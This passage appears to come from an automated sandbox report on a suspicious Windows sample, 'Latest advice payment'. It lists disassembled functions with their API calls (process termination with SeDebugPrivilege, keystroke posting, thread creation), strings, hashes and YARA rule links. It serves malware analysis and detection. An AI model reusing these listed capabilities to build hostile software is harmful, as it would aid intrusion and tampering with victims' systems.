                                                            • Opcode ID: 09eb7bf948701bb799f67ad7ef4810da5ce42ad4ea4c310d1cd9b92f7a83e3be
                                                            • Instruction ID: abd79333681076bad34aee86793a7c1b4a85b11de2b00b74f8b2144e0d8c9ca5
                                                            • Opcode Fuzzy Hash: 09eb7bf948701bb799f67ad7ef4810da5ce42ad4ea4c310d1cd9b92f7a83e3be
                                                            • Instruction Fuzzy Hash: 245131B24083859FC724EBA4D895EDB7BECBF84350F40092EB585D3151EF34A688CB56
                                                            Function 005E8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005E86FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: a77ee80a6e5b0e39cb4336889b148e9c8a2ed09e5f08649ba6e4323bf65f0418
                                                            • Instruction ID: 37da5ba4b5242d17c694512682f033c428ce35a64bc7ef0beb45bf2e9a2cdb1a
                                                            • Opcode Fuzzy Hash: a77ee80a6e5b0e39cb4336889b148e9c8a2ed09e5f08649ba6e4323bf65f0418
                                                            • Instruction Fuzzy Hash: 5751A1305042D5BEEB289B268C89FBD3FA5FB15310F604915F9D9EA1E1CF72A980DB40
                                                            Function 00562B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0059C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0059C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0059C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0059C370
                                                            • DestroyIcon.USER32(00000000), ref: 0059C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0059C39C
                                                            • DestroyIcon.USER32(?), ref: 0059C3AB
                                                              • Part of subcall function 005EA4AF: DeleteObject.GDI32(00000000), ref: 005EA4E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            • Opcode ID: 2d3000c68c2b50397a4de4820f43249f38a4fd8421ce11b99223ad51d72fa711
                                                            • Instruction ID: 848a45d190042da727b390c1d6a5d7409897572bc2afa21f50bf71aaf476f200
                                                            • Opcode Fuzzy Hash: 2d3000c68c2b50397a4de4820f43249f38a4fd8421ce11b99223ad51d72fa711
                                                            • Instruction Fuzzy Hash: 02515C74A00A05AFDF24DF64DC85FAA7FB5FB58710F104928F952972A0DB70AD90DB50
                                                            Function 005B966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005BA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 005BA84C
                                                              • Part of subcall function 005BA82C: GetCurrentThreadId.KERNEL32 ref: 005BA853
                                                              • Part of subcall function 005BA82C: AttachThreadInput.USER32(00000000,?,005B9683,?,00000001), ref: 005BA85A
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 005B968E
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005B96AB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005B96AE
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 005B96B7
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005B96D5
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005B96D8
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 005B96E1
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005B96F8
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005B96FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 34c8134c5d02d6f9c68ffa6d5124dc4f0ef630ef6d4be9f75ff0b20f5e666109
                                                            • Instruction ID: 169d28424a2ae9a54806e2f87738c1cbcb1641c01b8a16b41d4c712ea63e72ed
                                                            • Opcode Fuzzy Hash: 34c8134c5d02d6f9c68ffa6d5124dc4f0ef630ef6d4be9f75ff0b20f5e666109
                                                            • Instruction Fuzzy Hash: 59117CB1950658BBF6106F60DC89EAA7F2DEB9D751F110425F284AF0A0CDB26C50EBA4
                                                            Function 005B8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,005B853C,00000B00,?,?), ref: 005B892A
                                                            • HeapAlloc.KERNEL32(00000000,?,005B853C,00000B00,?,?), ref: 005B8931
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005B853C,00000B00,?,?), ref: 005B8946
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,005B853C,00000B00,?,?), ref: 005B894E
                                                            • DuplicateHandle.KERNEL32(00000000,?,005B853C,00000B00,?,?), ref: 005B8951
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,005B853C,00000B00,?,?), ref: 005B8961
                                                            • GetCurrentProcess.KERNEL32(005B853C,00000000,?,005B853C,00000B00,?,?), ref: 005B8969
                                                            • DuplicateHandle.KERNEL32(00000000,?,005B853C,00000B00,?,?), ref: 005B896C
                                                            • CreateThread.KERNEL32(00000000,00000000,005B8992,00000000,00000000,00000000), ref: 005B8986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 6515f017d2553479bd341b4f6dddba6a53f57b9528c2005f7eb52ba38b64dcd3
                                                            • Instruction ID: 169ab13b7df622d89957d8a3e100d07183e07f3b9b34941d5fdf02f674773eb4
                                                            • Opcode Fuzzy Hash: 6515f017d2553479bd341b4f6dddba6a53f57b9528c2005f7eb52ba38b64dcd3
                                                            • Instruction Fuzzy Hash: D701BBB5240348FFE714ABA5DC8DF6B3BACEB99711F418421FA45DF1A1CA709804DB20
                                                            Function 005D9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 0-572801152
                                                            • Opcode ID: 6ea62ac85d7d3a38852feef5eb7600305ba1025a3e300373eece0391a333d2eb
                                                            • Instruction ID: b553ab94f655e62bb20dd45a2399739d529ba057ac5fcccd26e8ff62d88d8c82
                                                            • Opcode Fuzzy Hash: 6ea62ac85d7d3a38852feef5eb7600305ba1025a3e300373eece0391a333d2eb
                                                            • Instruction Fuzzy Hash: DAC18571A0021A9FDF20DF98D884AEEBBF9FB48314F15446BE905A7391E7709D45CB90
                                                            Function 005D975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005B710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?,?,005B7455), ref: 005B7127
                                                              • Part of subcall function 005B710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7142
                                                              • Part of subcall function 005B710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?,?), ref: 005B7150
                                                              • Part of subcall function 005B710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,005B7044,80070057,?), ref: 005B7160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 005D9806
                                                            • _memset.LIBCMT ref: 005D9813
                                                            • _memset.LIBCMT ref: 005D9956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 005D9982
                                                            • CoTaskMemFree.OLE32(?), ref: 005D998D
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 005D99DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: 436b2b3f656c66ec5b749815de0490dd21a225f8413a155bab834cd8f413b58f
                                                            • Instruction ID: cff7368e360038b1bc6b56a9ae2687175f9f61181c41038ae32a05ebc096c00e
                                                            • Opcode Fuzzy Hash: 436b2b3f656c66ec5b749815de0490dd21a225f8413a155bab834cd8f413b58f
                                                            • Instruction Fuzzy Hash: 5F911671D00229EBDB20DFA5DC85EDEBBB9BF48310F10415AF519A7291EB719A44CFA0
                                                            Function 005E6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005E6E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 005E6E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005E6E52
                                                            • _wcscat.LIBCMT ref: 005E6EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 005E6EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005E6EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 31843cff7a40bdfd338f371738a76685c559082a59bb5e3ee892c04511fc397b
                                                            • Instruction ID: a7245e2b45ee3470b1e3027ef3558c214e5f698a14c8cb4b3771e6af692d2e9b
                                                            • Opcode Fuzzy Hash: 31843cff7a40bdfd338f371738a76685c559082a59bb5e3ee892c04511fc397b
                                                            • Instruction Fuzzy Hash: 7341A170A00389ABDB259F64CC85BEA7BA9FF18390F10042AF584E71D1D6719D848B60
                                                            Function 005DE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 005C3C7A
                                                              • Part of subcall function 005C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 005C3C88
                                                              • Part of subcall function 005C3C55: CloseHandle.KERNEL32(00000000), ref: 005C3D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005DE9A4
                                                            • GetLastError.KERNEL32 ref: 005DE9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005DE9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 005DEA63
                                                            • GetLastError.KERNEL32(00000000), ref: 005DEA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 005DEAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: fd1b39eb11233fb98f39562751bda52fba6e9abfa77fd77f70c57a5b8032c8f3
                                                            • Instruction ID: 38505ac90f441046a539c341a8a6abc68b38bf41395152bef207f2e4e8a2a6bd
                                                            • Opcode Fuzzy Hash: fd1b39eb11233fb98f39562751bda52fba6e9abfa77fd77f70c57a5b8032c8f3
                                                            • Instruction Fuzzy Hash: 4B418A712002029FDB24EF18CC9AF6DBBA5BF84314F04841AF9469F3D2CB75A848DB91
                                                            Function 005C2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 005C3033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: ea5976d702eea36c97936ccec8399087ca4174c3d1ad4d0da546ed1ff4921dec
                                                            • Instruction ID: 64e59c2555a679782fcde40a12bdc50a581889e8fd00c05a9fe6b8999dabe4df
                                                            • Opcode Fuzzy Hash: ea5976d702eea36c97936ccec8399087ca4174c3d1ad4d0da546ed1ff4921dec
                                                            • Instruction Fuzzy Hash: 9111EB3274C38ABEE7149A94DC8AEAB7F9CFF15360F20406EF90076181DB715F4056A8
                                                            Function 005C42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005C4312
                                                            • LoadStringW.USER32(00000000), ref: 005C4319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005C432F
                                                            • LoadStringW.USER32(00000000), ref: 005C4336
                                                            • _wprintf.LIBCMT ref: 005C435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005C437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 005C4357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: 83b1f64444107bf39e9e8b55254b23931e5062010eefd0bb3313ce1cca4ba1b6
                                                            • Instruction ID: f34fc9e6ece0fae9ecd3edcd92664ed2d628ae128191a40f4d370a5b5706e8b0
                                                            • Opcode Fuzzy Hash: 83b1f64444107bf39e9e8b55254b23931e5062010eefd0bb3313ce1cca4ba1b6
                                                            • Instruction Fuzzy Hash: DB0162F290024CBFE715ABA0DD89FE6776CEB48700F0005A5BB85E6051EE745F899B70
                                                            Function 005ED43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 005ED47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 005ED49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 005ED6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005ED6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005ED716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 005ED735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 005ED75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 005ED77D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 8a1c7cf50f3497d9a450893e2abbe68b95435dca0240d0ffcfa2abd130593bc5
                                                            • Instruction ID: dfba222832064ea0658f131498fef9bf98796cdc828f687d4cc18923db7ba4bc
                                                            • Opcode Fuzzy Hash: 8a1c7cf50f3497d9a450893e2abbe68b95435dca0240d0ffcfa2abd130593bc5
                                                            • Instruction Fuzzy Hash: C3B17975600269EBDF18CF6AC9C57AD7BB1FF44701F088069EC889F295DB74A950CBA0
                                                            Function 00562A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000), ref: 00562ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00562B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000), ref: 0059C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000), ref: 0059C286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 531dcf7d7fd4fefb73b963bcf4ec569939f8776b1a7d8ac5450d40c67e733107
                                                            • Instruction ID: 654e1f400dcc6a41302d9d191f5e0d6c1d0d3606e74ce0514f4ad50b9eed4bf3
                                                            • Opcode Fuzzy Hash: 531dcf7d7fd4fefb73b963bcf4ec569939f8776b1a7d8ac5450d40c67e733107
                                                            • Instruction Fuzzy Hash: 9641D634608FC09ADB399BA89C8CB6A7F92BB95310F18891DE0C787561CAF5A845E711
                                                            Function 005C70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 005C70DD
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005C7114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 005C7130
                                                            • _memmove.LIBCMT ref: 005C717E
                                                            • _memmove.LIBCMT ref: 005C719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 005C71AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005C71BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 005C71DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: e1c33920cd8c5efe274ac1baf0567837f1c14f893f93bd6ea46db8d5254c3e54
                                                            • Instruction ID: d5a9d208845bed6d5fa22047ab2b702acfdb132278bfb784fe0f8921adf7c6ef
                                                            • Opcode Fuzzy Hash: e1c33920cd8c5efe274ac1baf0567837f1c14f893f93bd6ea46db8d5254c3e54
                                                            • Instruction Fuzzy Hash: DA315235900205EFDB44EFA4DC89AAB7B78FF85710F1481A9FD04AB256DB309A14DB60
                                                            Function 005E61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 005E61EB
                                                            • GetDC.USER32(00000000), ref: 005E61F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005E61FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 005E620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 005E6246
